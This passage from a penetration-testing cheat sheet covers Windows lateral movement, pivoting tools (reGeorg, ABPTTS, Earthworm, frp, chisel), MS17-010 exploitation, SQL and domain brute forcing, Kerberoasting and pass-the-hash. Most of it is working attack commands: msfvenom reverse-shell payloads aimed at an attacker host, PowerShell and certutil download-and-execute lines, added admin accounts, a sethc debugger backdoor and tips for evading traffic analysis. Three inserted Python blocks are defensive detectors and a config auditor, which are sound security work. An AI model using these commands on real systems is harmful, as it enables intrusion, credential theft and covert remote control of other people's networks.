if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file...
for /F "eol=#" %%i in (ip.txt) do echo %%i &(echo %%i &tasklist /s %%i /u administrator /p pass@123 /v) >>d:\result.txt
:end
exit
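The Schtasks recipes above (and the earlier batch hash-dumping loop) all leave the same trace on the target: Security event 4698 (task created) whose embedded task XML runs a binary from a staging directory as SYSTEM, followed within seconds by 4699 (task deleted). The following is an added example, not part of the original notes and not from any tool they mention: it parses the TaskContent XML of constructed 4698 records, pairs creations with deletions per host and task name, and scores each task on three independent signals. The sample events, the staging-directory list, the 300-second lifetime and the two-reason threshold are assumptions made for the example.

```python
import xml.etree.ElementTree as ET

TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"
NS = {"t": TASK_NS}
LOCAL_SYSTEM = "S-1-5-18"
# Assumed staging locations: writable by admins over the ADMIN$ share and rarely home to real services.
STAGING_DIRS = ("\\windows\\temp\\", "\\windows\\debug\\", "\\users\\public\\")


def _task_xml(command, user_id):
    """Build the TaskContent XML that event 4698 carries; used only to construct sample events."""
    return ('<Task xmlns="%s"><Principals><Principal id="Author"><UserId>%s</UserId>'
            '<RunLevel>HighestAvailable</RunLevel></Principal></Principals>'
            '<Actions Context="Author"><Exec><Command>%s</Command></Exec></Actions></Task>'
            % (TASK_NS, user_id, command))


# Constructed Security events as logged on the *target* hosts. Not real telemetry.
SAMPLE_EVENTS = [
    {"ts": 0, "host": "ws01", "id": 4698, "SubjectUserName": "administrator", "TaskName": "\\windowsupdate",
     "TaskContent": _task_xml(r"c:\windows\temp\getpass.exe", LOCAL_SYSTEM)},
    {"ts": 15, "host": "ws01", "id": 4699, "SubjectUserName": "administrator", "TaskName": "\\windowsupdate"},
    {"ts": 30, "host": "srv01", "id": 4698, "SubjectUserName": "backupadmin", "TaskName": "\\NightlyBackup",
     "TaskContent": _task_xml(r"C:\Program Files\Backup\run.exe", "S-1-5-21-1111-2222-3333-1105")},
    {"ts": 60, "host": "ws02", "id": 4698, "SubjectUserName": "administrator", "TaskName": "\\CleanupTmp",
     "TaskContent": _task_xml(r"C:\Windows\System32\cleanmgr.exe", LOCAL_SYSTEM)},
    {"ts": 3600 * 72, "host": "ws02", "id": 4699, "SubjectUserName": "administrator", "TaskName": "\\CleanupTmp"},
]


def task_facts(xml_text):
    """(command, principal SID) from a task definition."""
    root = ET.fromstring(xml_text)
    cmd = root.findtext(".//t:Exec/t:Command", default="", namespaces=NS)
    user = root.findtext(".//t:Principal/t:UserId", default="", namespaces=NS)
    return cmd, user


def analyse(events, max_lifetime=300, min_reasons=2):
    """Pair 4698 with 4699 per (host, task) and return tasks with at least min_reasons signals."""
    tasks = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["host"], ev["TaskName"])
        if ev["id"] == 4698:
            cmd, user = task_facts(ev["TaskContent"])
            reasons = []
            if user == LOCAL_SYSTEM:
                reasons.append("runs as SYSTEM")
            if any(d in cmd.lower() for d in STAGING_DIRS):
                reasons.append("binary in staging directory: " + cmd)
            tasks[key] = {"host": ev["host"], "task": ev["TaskName"], "creator": ev["SubjectUserName"],
                          "created": ev["ts"], "reasons": reasons}
        elif ev["id"] == 4699 and key in tasks:
            age = ev["ts"] - tasks[key]["created"]
            if age <= max_lifetime:
                tasks[key]["reasons"].append("deleted %ds after creation" % age)
    return [t for t in tasks.values() if len(t["reasons"]) >= min_reasons]


if __name__ == "__main__":
    for hit in analyse(SAMPLE_EVENTS):
        print(hit)
```

Because the loop above creates the same task name on every host in ip.txt within minutes, a second, fleet-level query (one creator account, one task name, many hosts, short interval) catches the campaign even where a single host's task looks unremarkable; that aggregation is the same fan-out logic as the scan detector and is left out here.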

Adding routes in MSF

# route add <internal NIC IP> <netmask> <session id>
# route list
&
Meterpreter>run get_local_subnets      (show the subnets, then add the route)
# run autoroute -s <internal NIC IP>/24
# run autoroute -p                     (show the routing table)
&
Meterpreter>run post/multi/manage/autoroute

MSF named-pipe listener

On a machine that already has a meterpreter session, configure a pipe pivot listener
meterpreter > pivot add -t pipe -l <controlled host IP> -n bgpipe -a x86 -p windows
Generate the payload
>msfvenom -p windows/meterpreter/reverse_named_pipe PIPEHOST=<controlled host IP> PIPENAME=bgpipe -f exe -o pipe.exe

Proxies

SSH

Forward proxy
SSH dynamic forwarding builds an encrypted forward SOCKS tunnel. On the target that has outbound access, edit sshd_config and restart the ssh service:
#vim /etc/ssh/sshd_config
AllowTcpForwarding yes        allow TCP forwarding
GatewayPorts yes              allow remote hosts to connect to locally forwarded ports
TCPKeepAlive yes              keep TCP sessions alive
PasswordAuthentication yes    password authentication
On the external attack machine:
>ssh -C -f -N -g -D 0.0.0.0:12138 root@<outbound target IP> -p 22
Set a global proxy in MSF (or use other software)
>setg proxies socks5:0.0.0.0:12138
and the machines in the isolated segment can be reached.

Reverse proxy
#vim /etc/ssh/sshd_config
AllowTcpForwarding yes        allow TCP forwarding
GatewayPorts yes              allow remote hosts to connect to locally forwarded ports
TCPKeepAlive yes              keep TCP sessions alive
PasswordAuthentication yes    password authentication
ClientAliveInterval           set to 30-60 to keep the connection alive
ClientAliveCountMax           uncomment; number of unanswered keepalive requests before the connection is dropped
192.168.0.107 is the external attack machine. On the internal target:
>ssh -p 22 -qngfNTR 12138:127.0.0.1:22 root@192.168.0.107
On the attack machine:
>ssh -p 12138 -qngfNTD 12345 root@192.168.0.107
With the tunnel up, point the proxy client at <attack machine external IP>:12345 to reach the internal network.
SSH tunnel + RC4 double encryption
Generate the payload
>msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 rc4password=123456 lport=446 -f exe -o /var/www/html/bind.exe
MSF settings
>setg proxies socks5:0.0.0.0:12138
>use exploit/multi/handler
>set payload windows/x64/meterpreter/bind_tcp_rc4
>set rc4password 123456
>set rhost 10.1.1.97
>set lport 446
Public SSH tunnel + local MSF
>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 -b '\x00' LHOST=<public IP> LPORT=12138 -f exe -o /var/www/html/1.exe
The handler listens on <local IP>:12138
SSH forwarding
>ssh -N -R 12138:<local internal IP>:12138 root@<public IP>
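The four sshd_config settings the tunnelling recipe switches on (AllowTcpForwarding, GatewayPorts, TCPKeepAlive, PasswordAuthentication) are exactly the ones a hardening baseline should pin, and sshd's own parsing rules matter for the check: the first occurrence of a keyword wins, and a later Match block can loosen a value for particular users. The following is an added example, not part of the original notes and not from any tool they mention: it parses a constructed sshd_config with those rules, resolves absent keywords to the sshd_config(5) defaults, and reports every global or Match-block value that differs from the hardened value. The sample config, the hardened-value table and the choice of keywords are assumptions made for the example.

```python
# keyword -> (hardened value, sshd default when absent, why it matters). Defaults per sshd_config(5).
HARDENED = {
    "allowtcpforwarding":     ("no", "yes", "blocks -L/-R/-D port forwarding through this host"),
    "gatewayports":           ("no", "no",  "remote-forwarded ports stay bound to loopback"),
    "passwordauthentication": ("no", "yes", "key-only login; no password guessing"),
    "permittunnel":           ("no", "no",  "no tun(4) device forwarding"),
}

# Constructed sshd_config, not from a real host.
SAMPLE_SSHD_CONFIG = """# constructed sample
Port 22
AllowTcpForwarding yes
GatewayPorts yes
TCPKeepAlive yes
PasswordAuthentication yes
ClientAliveInterval 30
# later duplicate: sshd keeps the first value of a keyword, so this line has no effect
AllowTcpForwarding no
Match User deploy
    AllowTcpForwarding local
"""


def parse_sshd_config(text):
    """Return (global settings, [(match criteria, settings), ...]) with lower-cased keywords.

    Mirrors sshd: comments and blank lines are skipped, the first occurrence of a keyword
    wins, and everything after a Match line belongs to that block until the next Match.
    """
    global_settings, match_blocks = {}, []
    current = global_settings
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        keyword = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if keyword == "match":
            current = {}
            match_blocks.append((value, current))
            continue
        current.setdefault(keyword, value)
    return global_settings, match_blocks


def audit_sshd(text):
    """(scope, keyword, observed, wanted, reason) for each value that differs from HARDENED."""
    global_settings, match_blocks = parse_sshd_config(text)
    findings = []
    for keyword, (wanted, default, why) in HARDENED.items():
        observed = global_settings.get(keyword, default).lower()
        if observed != wanted:
            findings.append(("global", keyword, observed, wanted, why))
        for criteria, block in match_blocks:
            if keyword in block and block[keyword].lower() != wanted:
                findings.append(("Match " + criteria, keyword, block[keyword].lower(), wanted, why))
    return findings


if __name__ == "__main__":
    for finding in audit_sshd(SAMPLE_SSHD_CONFIG):
        print(finding)
```

The `sshd -T` command prints the effective configuration with all defaults resolved and is the better input on a live host (`sshd -T -C user=deploy` evaluates the Match blocks too); the parser here exists for auditing configs at rest, such as in a configuration-management repository.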

socks4a

#use auxiliary/server/socks4a
#set srvhost 0.0.0.0
#set srvport 1080
#run
For a multi-layer network, configure one more port.
Win: Proxifier & Sockscap64
Linux: proxychains & browser
&
meterpreter > ipconfig
IP Address : 10.1.13.3
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter > bg
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit

socks5

#use auxiliary/server/socks5
#set srvhost 0.0.0.0
#set srvport 1080
#run
Browser

Web-based socks5

reGeorg
https://github.com/sensepost/reGeorg
>python reGeorgSocksProxy.py -u http://<target>/tunnel.aspx -l <external IP> -p 10080
Open Proxifier and change the port to the one given to the script, 10080.
Or proxychains:
#vim /etc/proxychains.conf
Uncomment dynamic_chain
>add socks5 127.0.0.1 10080
Or MSF:
>setg proxies socks5:<external IP>:10080
>setg ReverseAllowProxy true   allow reverse proxy
Neo-reGeorg
Step 1. Set a password, generate tunnel.(aspx|ashx|jsp|jspx|php) and upload it to the web server
$ python3 neoreg.py generate -k password
Disguised page:
$ python3 neoreg.py generate -k <you_password> --file 404.html
Step 2. Use neoreg.py to connect to the web server and start a local socks proxy
$ python3 neoreg.py -k password -u http://xx/tunnel.php
$ python3 neoreg.py -k <you_password> -u <server_url> --skip
Start the proxy:
$ python neoreg.py -k <you_password> -l <external IP> -p 10081 -u http://xx/neo-tunnel.aspx


ABPTTS port forwarding
https://github.com/nccgroup/ABPTTS
Port forwarding:
>python abpttsfactory.py -o webshell   generate the shell
Upload the generated script from the ./webshell directory to the target.
>python abpttsclient.py -c webshell/config.txt -u "http://<target URL>/trans.aspx" -f <attacker IP>:12345/<target IP>:3389

Forwarding a port of another internal host through ABPTTS:
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.105:3389

Forwarding several hosts or ports:
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.105:3389 -f 192.168.0.107:33891/10.1.1.101:80 -f 192.168.0.107:33892/10.1.1.102:22
SSH proxy into a first-level subnet (requires a Linux target with privileges):
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.108:22
>ssh -p 33890 -qTfnN -D 0.0.0.0:1081 root@192.168.0.107
Then configure proxychains.
SSH proxy into a second-level subnet (requires web privileges on a target; one first-level internal host with web privileges forwards the internal web server out, and the ABPTTS shell is uploaded to it):
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:8080/10.1.1.108:80
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.107:8080/qq.aspx -f 192.168.0.107:222/10.1.1.106:22
An SSH connection to 192.168.0.107:222 reaches the second-level network.
Reverse msf: on kali generate a bind-type payload
>msfvenom -p linux/x64/shell_bind_tcp LPORT=12138 -f elf -o shell
Run it on the second-level Linux host that has no internet access, then expose its port 12138 through ABPTTS:
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:13128/10.1.1.101:12138
Have msf connect to local port 13128.
Tunna forwarding
>python proxy.py -u http://192.168.0.98/tunnel.aspx -l 12138 -r 3389 -v

Earthworm

Forward (target has an external IP):
>ew -s ssocksd -l 888
Connect sockscap64 to the target's external IP, port 888.
Reverse socks5 (target has no external IP):
External attacker machine:
>ew -s rcsocks -l 1008 -e 888
-l is the port the socks client connects to; -e is the port used for communication between the target and the VPS.
Target:
>ew -s rssocks -d <external IP> -e 888
Connect sockscap64 to the attacker's external IP, port 1008.
Two-level environment (A has an external IP, B is internal without one):
Target B:
>ew -s ssocksd -l 888
Target A:
>ew -s lcx_tran -l 1080 -f <target B> -g 888
Connect Sockscap64 to target A's external IP, port 1080.
Two-level environment (A has no external IP, B is internal without one):
External attacker machine:
>ew -s lcx_listen -l 10800 -e 8888
Target B:
>ew -s ssocksd -l 999
Target A:
>ew -s lcx_slave -d <external IP> -e 8888 -f <target B> -g 999
Connect Sockscap64 to the attacker's external IP, port 10800.
Three-level environment (A has no external IP, B is internal without one and reaches A, C reaches B):
External attacker machine:
>ew -s rcsocks -l 1008 -e 888
Target A:
>ew -s lcx_slave -d <external attacker> -e 888 -f <target B> -g 999
Target B:
>ew -s lcx_listen -l 999 -e 777
Target C:
>ew -s rssocks -d <target B> -e 777
Connect Sockscap64 to the attacker's external IP, port 1008.

Frp

https://github.com/fatedier/frp/releases/
Requirements: the target can reach the internet and you have your own public IP.
Configure frps.ini on the attacker's external server:
[common]
bind_port=8080
Client config on the target:
[common]
server_addr=<server external IP>
server_port=8080
[socks5]
type=tcp
remote_port=12345
plugin=socks5
use_encryption=true
use_compression=true
The last two lines enable encryption and compression, which can evade traffic-analysis devices.
Upload frpc.exe and frpc.ini to the target and run frpc.exe directly (in practice it may report that the config file cannot be found; use -c to specify the path: frpc.exe -c <path>). The file and config names can be changed to draw less attention.
On the public VPS:
./frps -c frps.ini
On the target:
./frpc -c frpc.ini
Set the global variables in MSF:
>setg proxies socks5:<public IP>:12345
>setg ReverseAllowProxy true   allow reverse proxy

Ending the attack:
tasklist
taskkill /pid <PID> -t -f

SSF

https://github.com/securesocketfunneling/ssf/releases
Forward socks proxy
On the border host:
>ssfd.exe -p 1080
On Linux:
./ssfd -p 1080
On the attacker machine:
>ssf.exe -D 12138 -p 1080 192.168.0.98 (border host IP)
Configure proxychains or Proxifier locally.
Reverse socks proxy
On the attacker machine:
>ssfd.exe -p 1080
On the internal host:
>ssf.exe -F 12138 -p 1080 192.168.0.106 (attacker IP)

Multi-level chaining
On the deepest internal host:
>ssfd.exe -p 1080 -c config.json
Add the field to the JSON file:
"circuit": [{"host": "<relay A IP>", "port":"1080"},{"host": "<relay B IP>", "port":"1080"}],
On every relay host:
>ssfd.exe -p 1080 -c config.json
On the border host:
>ssf.exe -c config.json -p 1080 <deep internal host IP> -X 12138
On the border host:
>nc.exe 127.0.0.1 12138
This yields a cmd shell on the deep internal host.
Reverse shell
On the attacker machine:
>ssfd.exe -p 1080 -c config.json
On the internal host:
On the attacker machine:
>nc 127.0.0.1 12138

Sass

https://github.com/Sass/libQtSass/releases/download/v2.0.2/Sass-libqss-v2.0.2-win64.7z
On the target create a config file 1.json with the content:
{"server":"0.0.0.0","server_port":13337,"local_address":"127.0.0.1","local_port":1080,"password":"123456","timeout":300,"method":"aes-256-cfb","fast_open":false,"workers": 1}
Run:
>Sass-libqss.exe -c 1.json -S
Attacker configuration:
Point the browser or other tools at proxy 127.0.0.1:1080 (http(s)/socks5 support required).


Goproxy

https://github.com/snail007/goproxy/releases
On the target:
>proxy.exe socks -t tcp -p "0.0.0.0:13337"
Configure Proxifier on the attacker machine.

Chisel

https://github.com/jpillora/chisel/releases
Attacker listens:
>chisel.exe server -p 12138 --reverse
On the target:
>chisel.exe client 192.168.0.102:12138 R:12345:127.0.0.1:12346
On the target:
>chisel.exe server -p 12346 --socks5
On the attacker machine:
>chisel.exe client 127.0.0.1:12345 socks
When the tunnel is established, port 1080 opens on the attacker machine and can be used.

Proxy software

Sockscap64
Proxifier
Proxychains
#vim /etc/proxychains.conf
Uncomment dynamic_chain
>add socks4 127.0.0.1 1080
#cp /usr/lib/proxychains3/proxyresolv /usr/bin

Ngrok intranet tunnelling

https://ngrok.com/
https://www.ngrok.cc/
Download ngrok
#ngrok authtoken <authtoken>
#ngrok http 8080
#ngrok tcp 8888

MS17-010

Scan:
#use auxiliary/scanner/smb/smb_ms17_010
#set rhosts 192.168.1.0/24
&
#nmap -sT -p 445,139 --open -v -Pn --script=smb-vuln-ms17-010.nse 10.11.1.0/20
Attack:
#use exploit/windows/smb/ms17_010_eternalblue   prone to BSOD
#set payload windows/x64/meterpreter/reverse_tcp
#use auxiliary/admin/smb/ms17_010_command
#set command REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f

MS08_067

#nmap -sT -p 445,139 --open -v -Pn --script=smb-vuln-ms08-067.nse 10.11.1.0/20
#use exploit/windows/smb/ms08_067_netapi
#set payload windows/meterpreter/reverse_tcp
CVE-2019-0708

Attacking MySQL

#use auxiliary/scanner/mysql/mysql_version   host discovery
#use auxiliary/scanner/mysql/mysql_login     MySQL brute force
#use exploit/multi/mysql/mysql_udf_payload   UDF privilege escalation
#use exploit/windows/mysql/mysql_mof         MOF privilege escalation
#use auxiliary/admin/mysql/mysql_sql         run commands

Attacking MSSQL

>PowerShell -Command "[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources()"   list MSSQL hosts in the domain
https://github.com/NetSPI/PowerUpSQL
>Get-SQLInstanceLocal          # discover local SQL Server instances
>Get-SQLInstanceDomain         # discover SQL Server instances in the domain
>Get-SQLInstanceBroadcast      # discover workgroup SQL Server instances
Workgroup MSSQL brute force:
>$Targets = Get-SQLInstanceBroadcast -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_.Status -like "Accessible"}
Domain MSSQL brute force:
>$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_.Status -like "Accessible"}
>Get-SQLInstanceBroadcast -Verbose | Get-SQLServerLoginDefaultPw -Verbose
>$Targets
Nishang script to brute-force MSSQL:
>Invoke-BruteForce -ComputerName dc.zone.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose -StopOnSuccess
#use auxiliary/scanner/mssql/mssql_login   brute-force hosts
#use auxiliary/admin/mssql/mssql_exec      call cmd
#use auxiliary/admin/mssql/mssql_sql       run SQL statements
#use exploit/windows/mssql/mssql_payload   get a session on the MSSQL host
http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1
Import the nishang script that runs MSSQL commands:
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1')
>Execute-Command-MSSQL -ComputerName 192.168.0.98 -UserName sa -Password admin   returns a powershell
#use auxiliary/scanner/mssql/mssql_hashdump   dump MSSQL password hashes
Server NTLM hash known but MSSQL credentials unknown: hash injection + socks to connect to MSSQL without a password
>mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:. /ntlm:{hash} /run:\"C:\*\SocksCap64\SocksCap64_RunAsAdmin.exe\"" "exit"
Add SSMS.exe to sockscap and launch it from there.
Command-line SQL tool:
https://github.com/uknowsec/SharpSQLTools

Payload for isolated hosts

An isolated host usually has no two-way route to the attacker machine; set the payload to bind so that the target listens.
>set payload windows/meterpreter/bind_tcp
>set RHOST <isolated host IP>

Brute force

Hydra

Options: -l username  -p password  -L username list  -P password list  -s port  -o output file
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mysql
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 ssh -s 22 -t 4
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mssql -vv
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 rdp -V
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 smb -vV
>hydra -L /root/user.txt -P pass.txt ftp://10.1.1.10

Medusa

Options: -h target name or IP  -H target list  -u username  -U username list  -p password  -P password list  -f stop after first success  -M service  -t threads  -n port  -e ns try an empty password and a password equal to the username
>medusa -h ip -u sa -P /pass.txt -t 5 -f -M mssql
>medusa -h ip -U /root/user.txt -P /pass.txt -t 5 -f -M mssql

Domain brute force

Kerbrute
https://github.com/ropnop/kerbrute
User enumeration:
>kerbrute_windows_amd64.exe userenum -d zone.com username.txt

Password spraying:
>kerbrute_windows_amd64.exe passwordspray -d zone.com use.txt password

Password brute force (this generates logs):
>kerbrute_windows_amd64.exe bruteuser -d zone.com pass.txt name
Combo brute force, format username:password:
>kerbrute_windows_amd64.exe bruteforce -d zone.com com.txt
DomainPasswordSpray
https://github.com/dafthack/DomainPasswordSpray
Automatically collects accounts and sprays a password:
>Invoke-DomainPasswordSpray -Password pass
Combo brute force (generates logs):
>Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -PasswordList passlist.txt -outfile result.txt
Single password:
>Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -Password password

Equation Group toolkit producing no session in the internal network

Generate an x64 or x86 DLL with msfvenom and replace x64.dll or x86.dll under the tool.
Windows Server 2008: generate x64.dll with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x64.dll
MSF configuration:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 12345
set lhost 192.168.0.107
Replace x64.dll under the Equation Group exploit tool. Only the target IP needs to be changed to obtain a session.
Windows Server 2003: generate x86.dll with msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x86.dll
MSF configuration:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 12345
set lhost 192.168.0.107
Use the ms17_010_command module to run system commands and add a user to the administrators group, then specify SMBPass and SMBUser to establish a Windows-accessible named pipe.

Kerberoasting

https://github.com/nidem/kerberoast

SPN discovery

cmd
>setspn -T <domain> -Q */*
Powershell

https://github.com/PyroTek3/PowerShell-AD-Recon

Powerview
>Get-NetComputer -SPN termsrv*
>Get-NetUser -SPN
>Import-Module GetUserSPNs.ps1
Empire
>usemodule situational_awareness/network/get_spn

Request tickets

>Add-Type -AssemblyName System.IdentityModel
>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN"
&
>kerberos::ask /target:SPN

Export tickets

mimikatz>kerberos::list /export

Crack passwords

>python tgsrepcrack.py word.txt file.kirbi
https://github.com/leechristensen/tgscrack
>python extractServiceTicketParts.py file.kirbi
>tgscrack.exe -hashfile hash.txt -wordlist word.txt

Rewrite tickets

>python kerberoast.py -p Password123 -r file.kirbi -w new.kirbi -u 500
>python kerberoast.py -p Password123 -r file.kirbi -w new.kirbi -g 512
Inject into memory:
>kerberos::ptt new.kirbi

GetUserSPNs

https://github.com/SecureAuthCorp/impacket
Request TGS:
>python GetUserSPNs.py -request -dc-ip 10.1.1.1 zone.com/y
Crack:
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt

ASREPRoasting

Possible when a user has Kerberos pre-authentication disabled.
>Rubeus.exe asreproast /user:y /dc:10.1.1.100 /domain:zone.com
Or use PowerView together with https://github.com/gold1029/ASREPRoast to find domain users that do not require Kerberos pre-authentication:
>Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
>Get-ASREPHash -UserName y -Domain zone.com -Verbose
Crack the RC4-HMAC AS-REP:
>john hash.txt --wordlist=wordlist.txt
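Both techniques above leave a distinctive trace on the domain controller: Kerberoasting shows up as event 4769 TGS requests with RC4 (etype 0x17) for several user SPNs from one account, and AS-REP roasting as event 4768 with pre-authentication type 0 and RC4. The detector below is an added example, not code from Pentest_Note; the EVENTS list is constructed and the field names are simplified from the Windows audit events.

```python
"""Flag Kerberoasting and AS-REP roasting patterns in Kerberos audit events.
Added example, not from Pentest_Note; EVENTS is constructed and uses
simplified field names for Windows events 4768 / 4769."""
from collections import defaultdict

RC4_HMAC = 0x17        # tools request RC4 because that hash cracks fastest (hashcat -m 13100)
NO_PREAUTH = 0         # 4768 PreAuthType 0: ticket issued without pre-authentication
MACHINE_SUFFIX = "$"   # machine-account SPNs are normal traffic, not roasting targets

EVENTS = [  # constructed: 4769 = TGS request, 4768 = TGT (AS) request
    {"id": 4769, "account": "y@ZONE.COM", "service": "MSSQLSvc/sql01.zone.com", "etype": 0x17, "ip": "10.1.1.98"},
    {"id": 4769, "account": "y@ZONE.COM", "service": "http/web01.zone.com", "etype": 0x17, "ip": "10.1.1.98"},
    {"id": 4769, "account": "y@ZONE.COM", "service": "termsrv/ts01.zone.com", "etype": 0x17, "ip": "10.1.1.98"},
    {"id": 4769, "account": "y@ZONE.COM", "service": "SUB2K8$", "etype": 0x12, "ip": "10.1.1.98"},
    {"id": 4769, "account": "alice@ZONE.COM", "service": "cifs/dc.zone.com", "etype": 0x12, "ip": "10.1.1.50"},
    {"id": 4768, "account": "svc_backup", "preauth": 0, "etype": 0x17, "ip": "10.1.1.98"},
    {"id": 4768, "account": "alice", "preauth": 2, "etype": 0x12, "ip": "10.1.1.50"},
]


def kerberoast_suspects(events, min_services=3):
    """Accounts that requested RC4 service tickets for at least min_services
    distinct non-machine SPNs: the pattern GetUserSPNs.py -request and the
    PowerShell KerberosRequestorSecurityToken loop above produce."""
    rc4_spns = defaultdict(set)
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4_HMAC:
            continue
        if e["service"].endswith(MACHINE_SUFFIX):
            continue
        rc4_spns[e["account"]].add(e["service"])
    return {acct: sorted(spns) for acct, spns in rc4_spns.items() if len(spns) >= min_services}


def asrep_roast_suspects(events):
    """(account, source ip) pairs for TGT requests answered without
    pre-authentication and encrypted with RC4: the AS-REP that john cracks
    in the ASREPRoasting section above."""
    return sorted({(e["account"], e["ip"]) for e in events
                   if e["id"] == 4768 and e.get("preauth") == NO_PREAUTH and e["etype"] == RC4_HMAC})


if __name__ == "__main__":
    print("Kerberoasting:", kerberoast_suspects(EVENTS))
    print("AS-REP roasting:", asrep_roast_suspects(EVENTS))
```

Accounts surfaced by the second check are exactly those with "Do not require Kerberos preauthentication" set; clearing that flag removes the exposure, and the first check is only meaningful where service accounts still allow RC4.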

PASS-THE-HASH

Allow all members of the local administrators group to connect:
>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

WMIExec & TheHash

>powershell -ep bypass
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-WMIExec.ps1');
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-TheHash.ps1');
>Invoke-TheHash -Type WMIExec -Target 192.168.0.0/24 -Domain zone.com -Username godadmin -Hash f1axxxxxxxxxb771

WMI

>net use \\1.1.1.1\admin$ /user:"administrator" "password"
>copy windowsupdate.exe \\1.1.1.1\admin$\dir\
>wmic /NODE:"1.1.1.1" /user:"administrator" /password:"password" PROCESS call create "c:\windows\dir\windowsupdate.exe"
>del \\1.1.1.1\admin$\dir\windowsupdate.exe /F
>net use \\1.1.1.1\admin$ /del
wmiexec.py
https://github.com/SecureAuthCorp/impacket
>python wmiexec.py -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 <domain>/Administrator@192.168.11.1 "whoami"
>python wmiexec.py admin@192.168.1.2
wmiexec.vbs
Semi-interactive:
>cscript //nologo wmiexec.vbs /shell 192.168.1.2 admin pass
Single command:
>cscript //nologo wmiexec.vbs /cmd 192.168.1.2 domain\admin pass "whoami"
Download and execute:
>wmic /node:192.168.0.115 /user:godadmin /password:password PROCESS call create "cmd /c certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe c:/windows/temp/win.exe & c:/windows/temp/win.exe & certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe delete"
Powershell
>wmic /NODE:192.168.3.108 /user:"godadmin" /password:"password" PROCESS call create "powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.107/xxx.txt');\""
Invoke-WMIExec
>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1a5b1a3641bec99ff92fe9df700b771 -Command \"net user admin Qwe@123 /add\" -Verbose"
>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1xxxxxxxxxxxxx771 -Command \"mshta http://192.168.0.107:8080/YAyAPN6odzbAzKn.hta\" -Verbose"

Psexec

>psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 <domain>/Administrator@192.168.1.1 "whoami"
>psexec.exe -accepteula \\192.168.1.2 -u admin -p pass cmd.exe   no confirmation window
Msf
#use exploit/windows/smb/psexec
#use exploit/windows/smb/psexec_psh   (powershell version)

Mimikatz

On Windows XP, Vista, 2008, 7, 2008 R2 and 2012 without the KB2871997 patch, PTH with NTLM:
mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm}
Run a program:
mimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm} /run:powershell.exe
On Windows 8.1, 2012 R2, and on Win 7, 2008 R2 and 2012 with KB2871997 installed, PTH with the AES key:
>privilege::debug
>sekurlsa::ekeys
